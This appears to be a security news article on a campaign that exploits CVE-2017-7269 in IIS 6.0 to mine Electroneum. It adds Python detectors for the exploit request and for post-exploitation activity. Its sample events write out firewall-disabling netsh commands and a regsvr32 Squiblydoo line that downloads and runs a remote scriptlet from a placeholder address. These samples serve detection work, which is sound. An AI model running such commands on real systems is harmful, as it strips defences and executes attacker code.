Microsoft IIS 6.0 Targeted for Electroneum Cryptomining Campaign

Researchers uncovered a campaign targeting systems that still run Microsoft Internet Information Services (IIS) 6.0 in order to mine the Electroneum cryptocurrency (ETN). The campaign exploits CVE-2017-7269, a vulnerability disclosed a year earlier that had previously been used to mine Monero. The North Korean hacker group Lazarus also exploited the same vulnerability in attacks against organizations.

Attackers are still exploiting IIS 6.0 even though it (together with Windows Server 2003) reached end of life three years ago. The researchers found that the exploit used in this campaign is similar to the public exploit for the buffer overflow vulnerability disclosed in March 2017; the difference lies in the shellcode, which carries this campaign's commands. Because the vulnerable WebDAV code converts the attacker-supplied URL to a different character encoding before the overflow occurs, only bytes that survive that conversion can be used, so the payload is built from alphanumeric (ASCII, Unicode-safe) shellcode that carries a Return-Oriented Programming (ROP) chain. The ROP chain lets the attacker work within those input restrictions and open a reverse shell to an attacker-controlled remote server. A reverse shell is an interactive shell in which the compromised machine connects out to the attacker's machine and waits for shell commands to execute.
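The exploit is delivered as a WebDAV PROPFIND request whose oversized "If:" header carries the encoded ROP chain and shellcode. The following detector, added here as an example and not code from the original report, parses raw HTTP requests and flags the combination of traits that characterises a CVE-2017-7269 attempt: a PROPFIND with a very long If header, the http://localhost/ resource tag used by the public proof of concept, and non-ASCII bytes (the payload arrives as UTF-8 multibyte sequences because the overflow happens during encoding conversion). The two request samples are constructed, and the 512-byte threshold is an assumption chosen for illustration.

```python
"""
Heuristic detector for CVE-2017-7269 exploitation attempts against IIS 6.0 WebDAV.
Added example, not code from the original report. The request samples are
constructed and the length threshold is an assumption.
"""
from dataclasses import dataclass, field

# Assumption: a legitimate WebDAV "If:" header is short (a few lock tokens or
# tagged resources); the public exploit needs well over a kilobyte of header
# to reach and overflow the target buffer.
IF_HEADER_MAX_LEN = 512


@dataclass
class Verdict:
    suspicious: bool
    reasons: list = field(default_factory=list)


def parse_request(raw: bytes):
    """Split a raw HTTP request into (method, path, {lowercase header: raw value})."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _version = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("ascii", "replace")] = value.strip()
    return method.decode("ascii", "replace"), path.decode("ascii", "replace"), headers


def inspect_request(raw: bytes) -> Verdict:
    """Flag PROPFIND requests whose If header looks like the CVE-2017-7269 trigger."""
    method, _path, headers = parse_request(raw)
    if_hdr = headers.get("if", b"")
    reasons = []
    if method.upper() != "PROPFIND" or not if_hdr:
        return Verdict(False, reasons)
    if len(if_hdr) > IF_HEADER_MAX_LEN:
        reasons.append(f"If header is {len(if_hdr)} bytes long")
    if b"<http://localhost/" in if_hdr.lower():
        reasons.append("If header carries an http://localhost/ resource tag (public PoC pattern)")
    if any(b > 0x7F for b in if_hdr):
        # The overflow occurs while the URL is widened to UTF-16, so the exploit
        # smuggles its ROP addresses in as UTF-8 multibyte sequences, not plain ASCII.
        reasons.append("non-ASCII bytes in If header")
    return Verdict(bool(reasons), reasons)


# Constructed samples (not real captures).
BENIGN_PROPFIND = (
    b"PROPFIND /docs/ HTTP/1.1\r\nHost: intranet\r\nDepth: 1\r\n"
    b"If: <http://intranet/docs/> (<opaquelocktoken:1234>)\r\n\r\n"
)
EXPLOIT_LIKE_PROPFIND = (
    b"PROPFIND / HTTP/1.1\r\nHost: victim\r\n"
    b"If: <http://localhost/" + b"a" * 700 + "\u5f7f\u8e7f".encode("utf-8") + b">\r\n\r\n"
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_PROPFIND), ("exploit-like", EXPLOIT_LIKE_PROPFIND)):
        verdict = inspect_request(req)
        print(label, verdict.suspicious, verdict.reasons)
```

Any one of the three traits can occur in legitimate traffic; the detector is useful because the exploit needs all of them at once, and a PROPFIND to a server that should not be serving WebDAV at all is worth an alert on its own.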

Once the reverse shell connects to the attacker's machine, the targeted system receives two commands. The first disables the compromised machine's firewall. The second uses a technique called Squiblydoo, which abuses regsvr32.exe, a signed Microsoft binary that application whitelisting normally trusts, to download and execute a remote Extensible Markup Language (XML) scriptlet containing script code of the attacker's choice. The scriptlet's code mimics legitimate, critical Microsoft Visual Basic scripts and processes, then installs the cryptominer into system startup so that it looks like a legitimate OS process.
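Both post-exploitation steps leave command lines that are easy to match in process-creation telemetry. The rules below are an added example, not code from the original report: they match the two netsh forms that turn the host firewall off (the Windows Server 2003 "firewall set opmode disable" syntax and the later "advfirewall ... state off" syntax), the Squiblydoo signature of regsvr32 loading scrobj.dll with a remote /i: URL, and, as a catch-all for the reverse shell itself, an IIS worker process spawning a shell. The event records are constructed, and their schema (id, image, parent, cmdline) is an assumption rather than any product's log format; the IP address is from a documentation range.

```python
"""
Detection rules for the post-exploitation stage described above, run over
process-creation events. Added example, not code from the original report.
Event schema (id, image, parent, cmdline) and the sample events are assumptions.
"""
import re
from typing import Iterable

# netsh on Windows Server 2003 ("firewall set opmode disable") and on later
# versions ("advfirewall set <profile> state off") both switch the host firewall off.
FIREWALL_OFF = re.compile(
    r"netsh(\.exe)?\s+(firewall\s+set\s+opmode\s+(mode=)?disable"
    r"|advfirewall\s+set\s+\w+\s+state\s+off)",
    re.IGNORECASE,
)

# Squiblydoo: regsvr32 /i:<URL> scrobj.dll fetches and runs a remote .sct scriptlet
# inside a Microsoft-signed binary; /s /n /u silence output and skip DllRegisterServer.
SQUIBLYDOO = re.compile(
    r"regsvr32(\.exe)?\b.*?/i:\s*https?://\S+.*?\bscrobj\.dll",
    re.IGNORECASE,
)

# IIS 6.0 runs application pools in w3wp.exe; inetinfo.exe is the legacy in-process host.
IIS_WORKER = {"w3wp.exe", "inetinfo.exe"}
SHELLS = {"cmd.exe", "regsvr32.exe", "powershell.exe", "cscript.exe", "wscript.exe"}


def classify(event: dict) -> list:
    """Return the names of every rule the event matches (empty list = nothing flagged)."""
    cmd = event.get("cmdline", "")
    parent = event.get("parent", "").lower()
    image = event.get("image", "").lower().rsplit("\\", 1)[-1]  # strip directory
    hits = []
    if FIREWALL_OFF.search(cmd):
        hits.append("host_firewall_disabled")
    if SQUIBLYDOO.search(cmd):
        hits.append("regsvr32_remote_scriptlet")
    if parent in IIS_WORKER and image in SHELLS:
        hits.append("iis_worker_spawned_shell")
    return hits


def scan(events: Iterable[dict]) -> list:
    """Return (event id, matched rules) for every event that matched at least one rule."""
    findings = []
    for event in events:
        hits = classify(event)
        if hits:
            findings.append((event["id"], hits))
    return findings


# Constructed sample events (not real telemetry); 203.0.113.10 is a documentation address.
SAMPLE_EVENTS = [
    {"id": "e1", "image": "C:\\Windows\\System32\\cmd.exe", "parent": "explorer.exe",
     "cmdline": "cmd.exe /c dir C:\\inetpub\\wwwroot"},
    {"id": "e2", "image": "C:\\Windows\\System32\\netsh.exe", "parent": "cmd.exe",
     "cmdline": "netsh firewall set opmode disable"},
    {"id": "e3", "image": "C:\\Windows\\System32\\regsvr32.exe", "parent": "cmd.exe",
     "cmdline": "regsvr32 /s /n /u /i:http://203.0.113.10/update.sct scrobj.dll"},
    {"id": "e4", "image": "C:\\Windows\\System32\\cmd.exe", "parent": "w3wp.exe",
     "cmdline": "cmd.exe /c netsh advfirewall set allprofiles state off"},
]

if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS):
        print(event_id, ", ".join(hits))
```

The third rule is the one to keep even after the campaign-specific command lines change: an IIS worker process has no business starting cmd.exe or regsvr32.exe, so that parent/child pair flags the reverse shell regardless of what the attacker runs afterwards.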

At the time the researchers published their report, the attackers had earned only $99 from the campaign, which at first suggests the operation was relatively unsuccessful. Two explanations for the low figure are possible: there may not be many vulnerable IIS 6.0 servers left to exploit, or the cybercriminals may be rotating wallet addresses from time to time.

Upgrading systems and moving off legacy servers is always the recommendation, though organizations may prefer to hold out until they can prepare accordingly. Securing and managing legacy systems is not easy, especially for enterprises: the training and data migration involved raise compliance, compatibility, and alignment concerns that consume considerable company resources. Threat actors watch for exactly these transitions, because an upgrade can take months to implement, possibly leaving entire networks open to attack in the meantime. Here are a few recommendations for managing your legacy systems:

Operating system vendors occasionally release emergency patches even for end-of-life products (Microsoft did so for CVE-2017-7269 on Windows Server 2003 in June 2017). Apply them as soon as they are made available.